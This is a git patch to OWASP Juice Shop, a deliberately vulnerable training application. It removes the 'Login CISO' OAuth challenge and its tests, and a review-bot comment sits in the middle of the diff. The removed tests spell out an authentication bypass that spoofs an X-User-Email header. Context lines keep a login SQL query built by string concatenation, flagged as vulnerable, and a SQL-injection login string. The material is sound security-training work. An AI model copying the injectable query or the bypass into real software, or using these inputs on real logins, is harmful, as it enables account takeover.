From 2c3c498501c7964aac84ab324ea8836b95faadf8 Mon Sep 17 00:00:00 2001
From: Bjoern Kimminich
Date: Wed, 28 Apr 2021 08:14:21 +0200
Subject: [PATCH] Remove CISO login challenge (resolves #1491)

---
 config.schema.yml | 5 -----
 config/fbctf.yml | 3 ---
 data/static/challenges.yml | 11 -----------
 routes/login.ts | 9 +--------
 test/api/loginApiSpec.ts | 19 -------------------
 test/e2e/loginSpec.ts | 30 ------------------------------
 6 files changed, 1 insertion(+), 76 deletions(-)

diff --git a/config.schema.yml b/config.schema.yml
index 8bad8fbb0b8..cf674d6c5b9 100644
--- a/config.schema.yml
+++ b/config.schema.yml
@@ -381,11 +381,6 @@ ctf:
 type: string
 code:
 type: string
- loginCisoChallenge:
- name:
- type: string
- code:
- type: string
 loginSupportChallenge:
 name:
 type: string
diff --git a/config/fbctf.yml b/config/fbctf.yml
index b40fc3c86a0..762fbe3fab6 100644
--- a/config/fbctf.yml
+++ b/config/fbctf.yml
@@ -132,9 +132,6 @@ ctf:
 oauthUserPasswordChallenge:
 name: South Sudan
 code: SS
- loginCisoChallenge:
- name: Angola
- code: AO
 loginSupportChallenge:
 name: Croatia
 code: HR
diff --git a/data/static/challenges.yml b/data/static/challenges.yml
index ff23755e8b6..41f2b8c489d 100644
--- a/data/static/challenges.yml
+++ b/data/static/challenges.yml
@@ -470,17 +470,6 @@
 hintUrl: 'https://pwning.owasp-juice.shop/part2/broken-authentication.html#log-in-with-bjoerns-gmail-account'
 mitigationUrl: 'https://cheatsheetseries.owasp.org/cheatsheets/Authentication_Cheat_Sheet.html'
 key: oauthUserPasswordChallenge
--
- name: 'Login CISO'
- category: 'Broken Authentication'
- tags:
- - Code Analysis
- description: 'Exploit OAuth 2.0 to log in with the Chief Information Security Officer''s user account.'
- difficulty: 5
- hint: 'Don''t try to beat Google''s OAuth 2.0 service. Rather investigate implementation flaws on OWASP Juice Shop''s end.'
- hintUrl: 'https://pwning.owasp-juice.shop/part2/broken-authentication.html#exploit-oauth-20-to-log-in-with-the-cisos-user-account'
- mitigationUrl: 'https://cheatsheetseries.owasp.org/cheatsheets/Authentication_Cheat_Sheet.html'
- key: loginCisoChallenge
 -
 name: 'Login Jim'
 category: 'Injection'
diff --git a/routes/login.ts b/routes/login.ts
index 2801350481e..3ca5f225aeb 100644
--- a/routes/login.ts
+++ b/routes/login.ts
@@ -30,14 +30,7 @@ module.exports = function login () {
 models.sequelize.query(`SELECT * FROM Users WHERE email = '${req.body.email || ''}' AND password = '${security.hash(req.body.password || '')}' AND deletedAt IS NULL`, { model: models.User, plain: true }) // vuln-code-snippet vuln-line loginAdminChallenge loginBenderChallenge loginJimChallenge
 .then((authenticatedUser) => {
 let user = utils.queryResultToJson(authenticatedUser)
- const rememberedEmail = security.userEmailFrom(req)
- if (rememberedEmail && req.body.oauth) {
- models.User.findOne({ where: { email: rememberedEmail } }).then(rememberedUser => {
- user = utils.queryResultToJson(rememberedUser)
- utils.solveIf(challenges.loginCisoChallenge, () => { return user.data.id === users.ciso.id }) // vuln-code-snippet hide-line
- afterLogin(user, res, next)
- })
- } else if (user.data?.id && user.data.totpSecret !== '') {
+ if (user.data?.id && user.data.totpSecret !== '') {
 res.status(401).json({
 status: 'totp_token_required',
 data: {
diff --git a/test/api/loginApiSpec.ts b/test/api/loginApiSpec.ts
index 34bbe4e2ed2..5dddd2b91ea 100644
--- a/test/api/loginApiSpec.ts
+++ b/test/api/loginApiSpec.ts
@@ -11,11 +11,6 @@ const config = require('config')
 const API_URL = 'http://localhost:3000/api'
 const REST_URL = 'http://localhost:3000/rest'

-const customHeader = {
- 'X-User-Email': 'ciso@' + config.get('application.domain'),
- Authorization: 'Bearer ' + security.authorize(),
- 'content-type': 'application/json'
-}
 const jsonHeader = { 'content-type': 'application/json' }

 describe('/rest/user/login', () => {
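Review bot: With the `rememberedEmail`/`oauth` branch gone, `security.userEmailFrom(req)` and `users.ciso` are no longer referenced in this block, so if these were their only uses in routes/login.ts the `users` import (and possibly `security.userEmailFrom`) is now dead and the linter will likely flag it; that cannot be confirmed from the hunk alone. The `oauth` flag in the request body is now silently ignored rather than rejected, which is acceptable for a removed feature but deserves a one-line comment on the new `if` line, e.g. `// 'oauth' in the body (and the remembered-email header the removed tests sent as X-User-Email) no longer affect which account is logged in`. The `login()` function starts and ends outside the hunk, so the remaining branches of this `.then` could not be checked here.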
@@ -240,20 +235,6 @@ describe('/rest/user/login', () => {
 })
 .expect('status', 401)
 })
-
- it('POST OAuth login as admin@juice-sh.op with "Remember me" exploit to log in as ciso@' + config.get('application.domain'), () => {
- return frisby.post(REST_URL + '/user/login', {
- headers: customHeader,
- body: {
- email: 'admin@' + config.get('application.domain'),
- password: 'admin123',
- oauth: true
- }
- })
- .expect('status', 200)
- .expect('header', 'content-type', /application\/json/)
- .expect('json', 'authentication', { umail: 'ciso@' + config.get('application.domain') })
- })
 })

 describe('/rest/saveLoginIp', () => {
diff --git a/test/e2e/loginSpec.ts b/test/e2e/loginSpec.ts
index 3cac48e3e80..7a320d29dc8 100644
--- a/test/e2e/loginSpec.ts
+++ b/test/e2e/loginSpec.ts
@@ -139,36 +139,6 @@ describe('/#/login', () => {
 protractor.expect.challengeSolved({ challenge: 'Login Bjoern' })
 })

- describe('challenge "loginCiso"', () => {
- it('should be able to log in as ciso@juice-sh.op by using "Remember me" in combination with (fake) OAuth login with another user', () => {
- email.sendKeys(`ciso@${config.get('application.domain')}`)
- password.sendKeys('wrong')
- browser.executeScript('document.getElementById("rememberMe-input").removeAttribute("class");')
- rememberMeCheckbox.click()
- loginButton.click()
-
- browser.executeScript(baseUrl => {
- const xhttp = new XMLHttpRequest()
- xhttp.onreadystatechange = function () {
- if (this.status === 200) {
- console.log('Success')
- }
- }
- xhttp.open('POST', `${baseUrl}/rest/user/login`, true)
- xhttp.setRequestHeader('Content-type', 'application/json')
- xhttp.setRequestHeader('Authorization', `Bearer ${localStorage.getItem('token')}`)
- xhttp.setRequestHeader('X-User-Email', localStorage.getItem('email'))
- xhttp.send(JSON.stringify({ email: 'admin@juice-sh.op', password: 'admin123', oauth: true }))
- }, browser.baseUrl)
-
- // Deselect to clear email field for subsequent tests
- rememberMeCheckbox.click()
- loginButton.click()
- })
-
- protractor.expect.challengeSolved({ challenge: 'Login CISO' })
- })
-
 describe('challenge "ghostLogin"', () => {
 it('should be able to log in as chris.pike@juice-sh.op by using `\' or deletedAt IS NOT NULL --`', () => {
 email.sendKeys('\' or deletedAt IS NOT NULL--')